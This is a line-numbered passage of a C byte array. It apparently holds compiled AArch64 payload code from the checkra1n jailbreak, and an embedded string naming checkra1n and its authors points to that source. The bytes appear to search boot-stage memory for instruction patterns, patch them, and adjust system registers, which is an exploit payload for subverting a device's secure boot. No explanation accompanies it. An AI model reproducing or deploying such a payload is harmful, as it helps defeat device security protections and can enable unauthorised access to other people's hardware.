0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 104 | 0xc0, 0x04, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 105 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 106 | 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x05, 0x00, 0x80, 107 | 0x01, 0x00, 0x00, 0x00, 0x0c, 0x05, 0x05, 0x42, 0x01, 0x00, 0x00, 0x00, 108 | 0x78, 0x1a, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 109 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 110 | 0x00, 0x05, 0x05, 0x42, 0x01, 0x00, 0x00, 0x00, 0x3c, 0x04, 0x00, 0x00, 111 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 112 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x80, 113 | 0x01, 0x00, 0x00, 0x00, 0xb4, 0x03, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 114 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 115 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 116 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 117 | 0x01, 0x00, 0x00, 0x00, 0x60, 0x05, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 118 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 119 | 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 120 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 121 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 122 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 123 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 124 | 0x04, 0x04, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 125 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 126 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x88, 0x9b, 0x00, 0x00, 127 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 128 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 129 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 130 | 0x00, 0x00, 0x00, 0x10, 0x01, 0x52, 0x00, 0x10, 0x7e, 0x01, 0x00, 0x10, 131 | 0x9f, 0x3f, 0x03, 0xd5, 0x20, 0x7b, 0x0b, 0xd5, 0x00, 0x00, 0x01, 0x91, 132 | 0x1f, 0x00, 0x01, 0xeb, 0xa3, 0xff, 0xff, 0x54, 0x9f, 0x3f, 0x03, 0xd5, 133 | 0xdf, 0x3f, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 134 | 0xc0, 0x03, 0x5f, 0xd6, 0x27, 0x00, 0xc0, 0xd2, 0x87, 0x40, 0xa8, 0xf2, 135 | 0x07, 0x00, 0x80, 0xf2, 0x01, 0x80, 0xb2, 0x52, 0x01, 0x20, 0x80, 0x72, 136 | 0xe1, 0x00, 0x00, 0xb9, 0xe1, 0x03, 0x84, 0x52, 0x61, 0xa0, 0xba, 0x72, 137 | 0xe1, 0x3c, 0x00, 0xb9, 0xe1, 0x4c, 0x00, 0xb9, 0x00, 0xc0, 0xa7, 0xd2, 138 | 0xe0, 0x00, 0x00, 0x8b, 0x00, 0x80, 0x0f, 0x91, 0x01, 0x20, 0x00, 0x91, 139 | 0xe2, 0x07, 0x61, 0xb2, 0x42, 0x1c, 0x41, 0x91, 0x40, 0xa4, 0x02, 0xf9, 140 | 0x41, 0xb4, 0x02, 0xf9, 0xe0, 0x80, 0x0f, 0x91, 0xc1, 0x01, 0x00, 0x10, 141 | 0x02, 0x04, 0x80, 0xd2, 0xeb, 0x00, 0x00, 0x94, 0x61, 0x02, 0x00, 0x10, 142 | 0x82, 0x2d, 0x81, 0xd2, 0xe8, 0x00, 0x00, 0x94, 0xe1, 0x03, 0x00, 0xaa, 143 | 0xe0, 0x03, 0x07, 0xaa, 0xdb, 0xff, 0xff, 0x97, 0x28, 0x00, 0xc0, 0xd2, 144 | 0x88, 0xbf, 0x80, 0xf2, 0x00, 0x00, 0x80, 0x52, 0x13, 0x00, 0x80, 0x52, 145 | 0x00, 0x01, 0x1f, 0xd6, 0x20, 0x00, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6, 146 | 0xe8, 0x07, 0x61, 0xb2, 0x08, 0x31, 0x41, 0x91, 0x00, 0x55, 0x40, 0xb9, 147 | 0x00, 0x78, 0x04, 0x12, 0x00, 0x55, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6, 148 | 0xf9, 0x03, 0x00, 0xaa, 0xf8, 0x03, 0x01, 0xaa, 0xf7, 0x03, 0x1e, 0xaa, 149 | 0xf6, 0x03, 0x1d, 0xaa, 0x87, 0x01, 0x00, 0x94, 0x20, 0x03, 0x42, 0xb9, 150 | 0x81, 0x89, 0x89, 0x52, 0x41, 0x08, 0xa4, 0x72, 0x1f, 0x00, 0x01, 0x6b, 151 | 0xa0, 0x01, 0x00, 0x54, 0x21, 0xcd, 0x89, 0x52, 0xe1, 0xed, 0xad, 0x72, 152 | 0x21, 0x03, 0x02, 0xb9, 0x20, 0x0b, 0x42, 0xb9, 0xe1, 0xac, 0x8c, 0x52, 153 | 0x21, 0x06, 0xa4, 0x72, 0x1f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 154 | 0xe0, 0x03, 0x19, 0xaa, 0xc1, 0x01, 0x00, 0x94, 0xdd, 0x01, 0x00, 0x94, 155 | 0xff, 0x01, 0x00, 0x94, 0x20, 0x13, 0x00, 0x91, 0x01, 0xc0, 0xa6, 0x52, 156 | 0x01, 0x01, 0x80, 0x72, 0xe2, 0x4b, 0x0e, 0x32, 0xe3, 0x2b, 0x18, 0x32, 157 | 0x05, 0x3c, 0xc0, 0x92, 0x05, 0xf0, 0xbf, 0xf2, 0x05, 0x02, 0x80, 0xf2, 158 | 0x06, 0x50, 0xbe, 0xd2, 0xc7, 0x40, 0x00, 0x91, 0x06, 0x28, 0xf7, 0xf2, 159 | 0x06, 0x01, 0xc0, 0xf2, 0xe7, 0x0b, 0xf7, 0xf2, 0x07, 0x41, 0xd8, 0xf2, 160 | 0x00, 0x10, 0x00, 0x91, 0x9d, 0x01, 0x00, 0x94, 0xa0, 0x12, 0x00, 0xb4, 161 | 0x04, 0x80, 0x5f, 0xf8, 0x84, 0x00, 0x05, 0x8a, 0x9f, 0x00, 0x06, 0xeb, 162 | 0x84, 0x10, 0x47, 0xfa, 0x21, 0xff, 0xff, 0x54, 0x04, 0x21, 0x80, 0x52, 163 | 0x04, 0x40, 0xa6, 0x72, 0x04, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0xd1, 164 | 0x01, 0x00, 0x80, 0x52, 0x01, 0x80, 0xb2, 0x72, 0x02, 0x00, 0x80, 0x52, 165 | 0x02, 0x80, 0xbf, 0x72, 0x03, 0x80, 0x00, 0xd1, 0x04, 0xcc, 0x5f, 0xf8, 166 | 0x84, 0x00, 0x02, 0x8a, 0x9f, 0x00, 0x01, 0xeb, 0x80, 0x00, 0x00, 0x54, 167 | 0x1f, 0x00, 0x03, 0xeb, 0x68, 0xff, 0xff, 0x54, 0x80, 0x00, 0x00, 0x14, 168 | 0x62, 0xa0, 0xba, 0x52, 0xe2, 0x03, 0x84, 0x72, 0x02, 0x08, 0x00, 0x29, 169 | 0xe0, 0x03, 0x19, 0xaa, 0xf2, 0x01, 0x00, 0x94, 0xe1, 0x2b, 0x18, 0x32, 170 | 0x01, 0x00, 0x01, 0x8b, 0x62, 0xa0, 0xba, 0x52, 0xe2, 0x03, 0x84, 0x72, 171 | 0x43, 0x80, 0x22, 0x11, 0x04, 0x80, 0xa2, 0x52, 0x87, 0x39, 0x80, 0xd2, 172 | 0x08, 0x00, 0x80, 0xd2, 0x1f, 0x00, 0x01, 0xeb, 0x22, 0x0e, 0x00, 0x54, 173 | 0x05, 0x00, 0x40, 0xb9, 0xbf, 0x00, 0x00, 0x71, 0xa4, 0x10, 0x42, 0x7a, 174 | 0xa4, 0x10, 0x43, 0x7a, 0xa4, 0x10, 0x44, 0x7a, 0x60, 0x00, 0x00, 0x54, 175 | 0x00, 0x10, 0x00, 0x91, 0xf7, 0xff, 0xff, 0x17, 0xe5, 0x03, 0x00, 0xaa, 176 | 0xa6, 0x4c, 0x40, 0xb8, 0xdf, 0x00, 0x00, 0x71, 0xc4, 0x10, 0x42, 0x7a, 177 | 0xc4, 0x10, 0x43, 0x7a, 0xc4, 0x10, 0x44, 0x7a, 0x60, 0x00, 0x00, 0x54, 178 | 0xe0, 0x03, 0x05, 0xaa, 0xee, 0xff, 0xff, 0x17, 0xa6, 0x00, 0x00, 0xcb, 179 | 0xdf, 0x00, 0x07, 0x6b, 0x42, 0x00, 0x00, 0x54, 0xf5, 0xff, 0xff, 0x17, 180 | 0xe9, 0x03, 0x00, 0xaa, 0xa8, 0x00, 0x00, 0xb5, 0xe8, 0x03, 0x09, 0xaa, 181 | 0xe0, 0x03, 0x05, 0xaa, 0x87, 0x3a, 0x80, 0xd2, 0xe4, 0xff, 0xff, 0x17, 182 | 0xe0, 0x03, 0x08, 0xaa, 0x61, 0x0e, 0x00, 0x10, 0x82, 0x39, 0x80, 0xd2, 183 | 0x6e, 0x00, 0x00, 0x94, 0xe0, 0x03, 0x09, 0xaa, 0x41, 0x1c, 0x00, 0x10, 184 | 0x82, 0x3a, 0x80, 0xd2, 0x6a, 0x00, 0x00, 0x94, 0x27, 0xc3, 0x09, 0x91, 185 | 0xe8, 0x24, 0x00, 0xa9, 0x20, 0x83, 0x0a, 0x91, 0xe8, 0x03, 0x00, 0xaa, 186 | 0x01, 0x0a, 0x00, 0x10, 0x02, 0x0c, 0x80, 0xd2, 0x63, 0x00, 0x00, 0x94, 187 | 0xe0, 0x03, 0x19, 0xaa, 0x01, 0x50, 0xba, 0x52, 0x41, 0x02, 0x80, 0x72, 188 | 0x02, 0x00, 0x80, 0x12, 0xe3, 0x2b, 0x18, 0x32, 0x48, 0x01, 0x00, 0x94, 189 | 0x00, 0x08, 0x00, 0xb4, 0xc1, 0xa3, 0xba, 0x52, 0x01, 0x00, 0x82, 0x72, 190 | 0xe2, 0x03, 0x80, 0x12, 0x03, 0x40, 0x80, 0x52, 0x4b, 0x01, 0x00, 0x94, 191 | 0x40, 0x07, 0x00, 0xb4, 0x41, 0x16, 0x00, 0x18, 0x02, 0x00, 0x80, 0x12, 192 | 0x03, 0x04, 0x80, 0x52, 0x3d, 0x01, 0x00, 0x94, 0xa0, 0x06, 0x00, 0xb4, 193 | 0x24, 0x53, 0x09, 0x91, 0x05, 0x98, 0xc0, 0x29, 0x85, 0x18, 0x81, 0x28, 194 | 0x05, 0x18, 0x41, 0x29, 0xc7, 0x7c, 0x18, 0x53, 0xff, 0x60, 0x01, 0x71, 195 | 0x60, 0x00, 0x00, 0x54, 0x85, 0x18, 0x81, 0x28, 0x13, 0x00, 0x00, 0x14, 196 | 0x85, 0x44, 0x00, 0xb8, 0xc7, 0x5c, 0x05, 0x13, 0x07, 0xc8, 0x27, 0x8b, 197 | 0xe7, 0xc0, 0x40, 0xf8, 0xff, 0x3c, 0x50, 0xf2, 0xc1, 0x04, 0x00, 0x54, 198 | 0xc6, 0x10, 0x00, 0x12, 0x06, 0x58, 0xba, 0x72, 0xe5, 0xbc, 0x60, 0xd3, 199 | 0xa6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 0x06, 0x54, 0xbe, 0x72, 200 | 0xe5, 0x7c, 0x50, 0xd3, 0xa6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 201 | 0x06, 0x50, 0xbe, 0x72, 0xe6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 202 | 0xe1, 0xcb, 0xba, 0x52, 0x01, 0x48, 0x80, 0x72, 0x81, 0x00, 0x00, 0xb9, 203 | 0x01, 0x58, 0xba, 0x52, 0x41, 0x02, 0x80, 0x72, 0x05, 0xbd, 0x60, 0xd3, 204 | 0xa1, 0x3c, 0x1b, 0x33, 0x01, 0x00, 0x00, 0xb9, 0x01, 0x54, 0xbe, 0x72, 205 | 0x05, 0x7d, 0x50, 0xd3, 0xa1, 0x3c, 0x1b, 0x33, 0x01, 0x04, 0x00, 0xb9, 206 | 0x01, 0x50, 0xbe, 0x72, 0x01, 0x3d, 0x1b, 0x33, 0x01, 0x08, 0x00, 0xb9, 207 | 0xe1, 0xc7, 0xba, 0x52, 0x01, 0x48, 0x80, 0x72, 0x01, 0x0c, 0x00, 0xb9, 208 | 0xe0, 0x03, 0x19, 0xaa, 0xe1, 0x03, 0x18, 0xaa, 0xfe, 0x03, 0x17, 0xaa, 209 | 0xfd, 0x03, 0x16, 0xaa, 0x9f, 0x3f, 0x03, 0xd5, 0xdf, 0x4f, 0x03, 0xd5, 210 | 0xc0, 0x03, 0x5f, 0xd6, 0x48, 0x00, 0xc0, 0xd2, 0x68, 0x05, 0xa2, 0xf2, 211 | 0x08, 0x00, 0x98, 0xf2, 0x00, 0x01, 0x40, 0xb9, 0x00, 0x78, 0x1f, 0x12, 212 | 0x00, 0x01, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x14, 0xf2, 0x03, 0x1e, 0xaa, 213 | 0xc0, 0xcf, 0x74, 0x92, 0x00, 0x00, 0x2f, 0x91, 0x81, 0x02, 0x00, 0x18, 214 | 0xc2, 0x4f, 0x40, 0xb8, 0x5f, 0x00, 0x01, 0x6b, 0xc1, 0xff, 0xff, 0x54, 215 | 0x04, 0x00, 0x1e, 0xcb, 0x02, 0x80, 0xa2, 0x52, 0x82, 0x6c, 0x02, 0x33, 216 | 0xc2, 0x03, 0x00, 0xb9, 0x21, 0xfd, 0xff, 0x58, 0x82, 0x39, 0x80, 0xd2, 217 | 0x08, 0x00, 0x00, 0x94, 0x01, 0xfd, 0xff, 0x58, 0x82, 0x3a, 0x80, 0xd2, 218 | 0x05, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 0xdb, 0xff, 0xff, 0x17, 219 | 0x24, 0x44, 0x40, 0xb8, 0x04, 0x44, 0x00, 0xb8, 0x42, 0x10, 0x00, 0x71, 220 | 0xa2, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0xdf, 0x4f, 0x03, 0xd5, 221 | 0xfc, 0x03, 0x1e, 0xaa, 0xfb, 0x03, 0x00, 0xaa, 0x48, 0x00, 0xc0, 0xd2, 222 | 0x68, 0x05, 0xa2, 0xf2, 0x08, 0x00, 0x80, 0xf2, 0x1f, 0x0d, 0x00, 0xb9, 223 | 0x1f, 0x1d, 0x00, 0xb9, 0xc8, 0x18, 0x00, 0x58, 0x08, 0xc0, 0x1e, 0xd5, 224 | 0x20, 0x02, 0x00, 0x10, 0x21, 0x00, 0xc0, 0xd2, 0x81, 0x00, 0xb0, 0xf2, 225 | 0x01, 0x00, 0x80, 0xf2, 0x22, 0x10, 0x40, 0x91, 0x1f, 0x00, 0x01, 0xeb, 226 | 0x02, 0x20, 0x42, 0xfa, 0x43, 0x01, 0x00, 0x54, 0x21, 0xb0, 0x01, 0x91, 227 | 0x22, 0xd0, 0x0c, 0x91, 0xe3, 0x03, 0x01, 0xaa, 0x04, 0x44, 0x40, 0xb8, 228 | 0x24, 0x44, 0x00, 0xb8, 0x3f, 0x00, 0x02, 0xeb, 0xa3, 0xff, 0xff, 0x54, 229 | 0x7a, 0x00, 0x00, 0x94, 0x60, 0x00, 0x1f, 0xd6, 0x20, 0x15, 0x00, 0x58, 230 | 0x41, 0x15, 0x00, 0x58, 0x02, 0x30, 0x81, 0x52, 0x7a, 0x00, 0x00, 0x94, 231 | 0x02, 0x98, 0x90, 0x52, 0x7d, 0x00, 0x00, 0x94, 0xe0, 0x14, 0x00, 0x58, 232 | 0xbf, 0x41, 0x00, 0xd5, 0x1f, 0x00, 0x00, 0x91, 0x00, 0x04, 0x40, 0x91, 233 | 0xbf, 0x40, 0x00, 0xd5, 0x1f, 0x00, 0x00, 0x91, 0x00, 0x08, 0x40, 0x91, 234 | 0x48, 0x14, 0x00, 0x58, 0x00, 0x01, 0x00, 0xf9, 0xff, 0x44, 0x03, 0xd5, 235 | 0x1f, 0x75, 0x08, 0xd5, 0x89, 0x23, 0x40, 0xd1, 0x07, 0x0c, 0xe0, 0xd2, 236 | 0x27, 0x84, 0x80, 0xf2, 0xe1, 0x03, 0x09, 0xaa, 0x02, 0x00, 0x90, 0x52, 237 | 0x6c, 0x00, 0x00, 0x94, 0xe8, 0x03, 0x09, 0xaa, 0x20, 0x00, 0xc0, 0xd2, 238 | 0x41, 0x00, 0xa0, 0x52, 0xa0, 0xd0, 0x80, 0xf2, 0x6f, 0x00, 0x00, 0x94, 239 | 0x40, 0x00, 0xc0, 0xd2, 0x01, 0x00, 0xa4, 0x52, 0x00, 0x00, 0x07, 0xaa, 240 | 0x6b, 0x00, 0x00, 0x94, 0xc0, 0x00, 0xc0, 0xd2, 0x01, 0x00, 0xa4, 0x52, 241 | 0x00, 0x00, 0x07, 0xaa, 0x67, 0x00, 0x00, 0x94, 0xe0, 0x00, 0xc0, 0xd2, 242 | 0x00, 0x00, 0xb8, 0xf2, 0x01, 0x40, 0xa0, 0x52, 0x00, 0x00, 0x07, 0xaa, 243 | 0x62, 0x00, 0x00, 0x94, 0x28, 0x11, 0x40, 0x91, 0x00, 0x05, 0x40, 0xb2, 244 | 0x20, 0x01, 0x03, 0xf9, 0xe0, 0x07, 0x61, 0xb2, 0x01, 0x01, 0xa0, 0x52, 245 | 0xe0, 0xc0, 0x80, 0xf2, 0x57, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 246 | 0x80, 0xe0, 0x9f, 0x52, 0x00, 0xa2, 0x1e, 0xd5, 0x09, 0x20, 0x1e, 0xd5, 247 | 0x20, 0x00, 0xa0, 0x52, 0x80, 0xa3, 0x94, 0x72, 0x40, 0x20, 0x1e, 0xd5, 248 | 0x1f, 0x87, 0x0e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 0xc0, 0x01, 0x80, 0x52, 249 | 0x00, 0x11, 0x1e, 0xd5, 0xa8, 0x01, 0x82, 0x52, 0x00, 0x10, 0x3e, 0xd5, 250 | 0x00, 0x00, 0x08, 0xaa, 0x00, 0x10, 0x1e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 251 | 0xe8, 0x0e, 0x00, 0x58, 0x80, 0x0e, 0x00, 0x58, 0x41, 0x00, 0xa0, 0x52, 252 | 0x01, 0x00, 0x88, 0x72, 0x22, 0x00, 0x80, 0x52, 0x00, 0x01, 0x3f, 0xd6, 253 | 0x73, 0x0e, 0x00, 0x10, 0x94, 0x0f, 0x00, 0x10, 0x68, 0x86, 0x40, 0xf8, 254 | 0x00, 0x00, 0x80, 0x52, 0x00, 0x01, 0x3f, 0xd6, 0x7f, 0x02, 0x14, 0xeb, 255 | 0x83, 0xff, 0xff, 0x54, 0x08, 0x0f, 0x00, 0x58, 0x20, 0x00, 0x80, 0x52, 256 | 0x00, 0x01, 0x3f, 0xd6, 0xc0, 0x09, 0x00, 0x10, 0xc1, 0x0e, 0x00, 0x58, 257 | 0xe2, 0x01, 0x80, 0xd2, 0x03, 0x14, 0x40, 0x38, 0x23, 0x14, 0x00, 0x38, 258 | 0x42, 0x04, 0x00, 0x51, 0xa2, 0xff, 0xff, 0x35, 0x40, 0x09, 0x00, 0x70, 259 | 0x21, 0x0e, 0x00, 0x58, 0xa2, 0x03, 0x80, 0xd2, 0x03, 0x14, 0x40, 0x38, 260 | 0x23, 0x14, 0x00, 0x38, 0x42, 0x04, 0x00, 0x51, 0xa2, 0xff, 0xff, 0x35, 261 | 0x40, 0x00, 0x80, 0x52, 0x81, 0x0d, 0x00, 0x58, 0x20, 0x00, 0x00, 0xb9, 262 | 0x48, 0x0c, 0x00, 0x58, 0xe0, 0x09, 0x00, 0x58, 0x81, 0x00, 0xa0, 0xd2, 263 | 0x00, 0x01, 0x3f, 0xd6, 0x31, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 264 | 0x40, 0x09, 0x00, 0x58, 0x01, 0x00, 0x41, 0x91, 0x20, 0x7b, 0x0b, 0xd5, 265 | 0x00, 0x00, 0x01, 0x91, 0x1f, 0x00, 0x01, 0xeb, 0xa3, 0xff, 0xff, 0x54, 266 | 0x0b, 0x00, 0x00, 0x94, 0xdf, 0x4f, 0x03, 0xd5, 0xbf, 0x41, 0x00, 0xd5, 267 | 0xff, 0x03, 0x40, 0x92, 0x1f, 0x41, 0x18, 0xd5, 0x1f, 0xc0, 0x1e, 0xd5, 268 | 0xdf, 0x3f, 0x03, 0xd5, 0xfe, 0x03, 0x1c, 0xaa, 0xe0, 0x03, 0x1b, 0xaa, 269 | 0x68, 0x07, 0x00, 0x58, 0x00, 0x01, 0x1f, 0xd6, 0x9f, 0x3f, 0x03, 0xd5, 270 | 0xdf, 0x3f, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 271 | 0xc0, 0x03, 0x5f, 0xd6, 0x03, 0x10, 0xc1, 0xa8, 0x23, 0x10, 0x81, 0xa8, 272 | 0x42, 0x40, 0x00, 0x71, 0xa8, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 273 | 0x3f, 0x7c, 0x81, 0xa8, 0x42, 0x40, 0x00, 0x71, 0xc8, 0xff, 0xff, 0x54, 274 | 0xc0, 0x03, 0x5f, 0xd6, 0x04, 0xfc, 0x4b, 0xd3, 0x21, 0xfc, 0x4e, 0xd3, 275 | 0x03, 0x00, 0x88, 0x52, 0x04, 0x00, 0x00, 0x14, 0x04, 0xfc, 0x56, 0xd3, 276 | 0x21, 0xfc, 0x59, 0xd3, 0x03, 0x40, 0xa0, 0x52, 0x84, 0x28, 0x7d, 0x92, 277 | 0x84, 0x00, 0x08, 0x8b, 0x02, 0x00, 0x80, 0x52, 0x80, 0x58, 0x22, 0xf8, 278 | 0x00, 0x00, 0x03, 0x8b, 0x42, 0x04, 0x00, 0x11, 0x5f, 0x00, 0x01, 0x6b, 279 | 0x83, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0x41, 0x00, 0xc0, 0xd2, 280 | 0x01, 0xe2, 0xa1, 0xf2, 0x81, 0x64, 0x80, 0xf2, 0x20, 0x00, 0x40, 0xb9, 281 | 0x00, 0x74, 0x1e, 0x12, 0x20, 0x00, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6, 282 | 0x1f, 0x20, 0x03, 0xd5, 0x59, 0x4f, 0x4c, 0x4f, 0x3a, 0x63, 0x68, 0x65, 283 | 0x63, 0x6b, 0x72, 0x61, 0x31, 0x6e, 0x00, 0x47, 0x41, 0x4e, 0x47, 0x3a, 284 | 0x4b, 0x4a, 0x43, 0x20, 0x48, 0x41, 0x58, 0x58, 0x3a, 0x41, 0x78, 0x69, 285 | 0x30, 0x6d, 0x58, 0x20, 0x45, 0x54, 0x41, 0x3a, 0x73, 0x6f, 0x6e, 0x00, 286 | 0x00, 0xc0, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x40, 0x04, 0x80, 287 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x90, 0x05, 0x80, 0x01, 0x00, 0x00, 0x00, 288 | 0x40, 0x42, 0x04, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 289 | 0x01, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 290 | 0x00, 0xc0, 0x05, 0x80, 0x01, 0x00, 0x00, 0x00, 0x0c, 0xf8, 0x00, 0x00, 291 | 0x01, 0x00, 0x00, 0x00, 0x18, 0xa7, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 292 | 0x54, 0x9d, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x9c, 0x1b, 0x00, 0x00, 293 | 0x01, 0x00, 0x00, 0x00, 0x48, 0x11, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 294 | 0x98, 0xad, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x88, 0xdf, 0x00, 0x00, 295 | 0x01, 0x00, 0x00, 0x00, 0x7c, 0x79, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 296 | 0xc0, 0x75, 0x04, 0x80, 0x01, 0x00, 0x00, 0x00, 0xf7, 0x75, 0x04, 0x80, 297 | 0x01, 0x00, 0x00, 0x00, 0x74, 0x75, 0x04, 0x80, 0x01, 0x00, 0x00, 0x00, 298 | 0x04, 0x00, 0x40, 0xb9, 0x84, 0x00, 0x02, 0x0a, 0x9f, 0x00, 0x01, 0x6b, 299 | 0xa0, 0x00, 0x00, 0x54, 0x00, 0x10, 0x00, 0x91, 0x63, 0x10, 0x00, 0x51, 300 | 0x43, 0xff, 0xff, 0x35, 0xe0, 0x03, 0x1f, 0xaa, 0xc0, 0x03, 0x5f, 0xd6, 301 | 0x04, 0x00, 0x40, 0xb9, 0x84, 0x00, 0x02, 0x0a, 0x9f, 0x00, 0x01, 0x6b, 302 | 0xa0, 0x00, 0x00, 0x54, 0x00, 0x10, 0x00, 0xd1, 0x63, 0x10, 0x00, 0x51, 303 | 0x43, 0xff, 0xff, 0x35, 0xe0, 0x03, 0x1f, 0xaa, 0xc0, 0x03, 0x5f, 0xd6, 304 | 0xe2, 0x03, 0x00, 0xaa, 0xa5, 0x4e, 0xb2, 0x52, 0x05, 0x00, 0x9a, 0x72, 305 | 0x06, 0x48, 0xb6, 0x52, 0xe7, 0x43, 0xb5, 0x52, 0x28, 0x40, 0xa5, 0x52, 306 | 0x08, 0x7c, 0x80, 0x72, 0x43, 0x44, 0x40, 0xb8, 0x64, 0x68, 0x1b, 0x12, 307 | 0x9f, 0x00, 0x05, 0x6b, 0xa1, 0xff, 0xff, 0x54, 0x66, 0x10, 0x1b, 0x33, 308 | 0x44, 0x00, 0x40, 0xb9, 0x83, 0x68, 0x1b, 0x12, 0x7f, 0x00, 0x06, 0x6b, 309 | 0x60, 0x01, 0x00, 0x54, 0x7f, 0x00, 0x08, 0x6b, 0xc1, 0xfe, 0xff, 0x54, 310 | 0xc9, 0x10, 0x1b, 0x12, 0x09, 0x40, 0xb5, 0x72, 0x89, 0x10, 0x10, 0x33, 311 | 0x44, 0x04, 0x40, 0xb9, 0x83, 0x68, 0x1b, 0x12, 0x7f, 0x00, 0x09, 0x6b, 312 | 0xe1, 0xfd, 0xff, 0x54, 0x42, 0x10, 0x00, 0x91, 0x87, 0x24, 0x00, 0x33, 313 | 0x47, 0x00, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6, 0xe2, 0x03, 0x00, 0xaa, 314 | 0xc7, 0x41, 0xa6, 0x52, 0x07, 0x7c, 0x80, 0x72, 0x08, 0x54, 0xaa, 0x52, 315 | 0x08, 0x10, 0x80, 0x72, 0x09, 0x40, 0xb5, 0x52, 0x09, 0x7e, 0x80, 0x72, 316 | 0xea, 0x40, 0x40, 0x51, 0x0b, 0x01, 0x02, 0x11, 0x43, 0x44, 0x40, 0xb8, 317 | 0x7f, 0x00, 0x07, 0x6b, 0x64, 0x10, 0x48, 0x7a, 0xa1, 0xff, 0xff, 0x54, 318 | 0x43, 0x90, 0x40, 0x29, 0x63, 0x6c, 0x1c, 0x12, 0x9f, 0x00, 0x0a, 0x6b, 319 | 0x84, 0x10, 0x4b, 0x7a, 0x60, 0x00, 0x49, 0x7a, 0xe1, 0xfe, 0xff, 0x54, 320 | 0x43, 0x00, 0x40, 0xb9, 0x44, 0x0c, 0x40, 0xb9, 0x63, 0x00, 0x04, 0x4b, 321 | 0x84, 0x7c, 0x1a, 0x53, 0x9f, 0x94, 0x00, 0x71, 0x60, 0x08, 0x43, 0x7a, 322 | 0x01, 0xfe, 0xff, 0x54, 0x42, 0x30, 0x00, 0x91, 0x43, 0x4c, 0x40, 0xb8, 323 | 0x64, 0x7c, 0x1a, 0x53, 0x9f, 0x94, 0x00, 0x71, 0xa1, 0xff, 0xff, 0x54, 324 | 0x63, 0x64, 0x00, 0x13, 0x47, 0x00, 0x00, 0x18, 0x47, 0xd8, 0x23, 0xb8, 325 | 0xc0, 0x03, 0x5f, 0xd6, 0xe2, 0x03, 0x00, 0xaa, 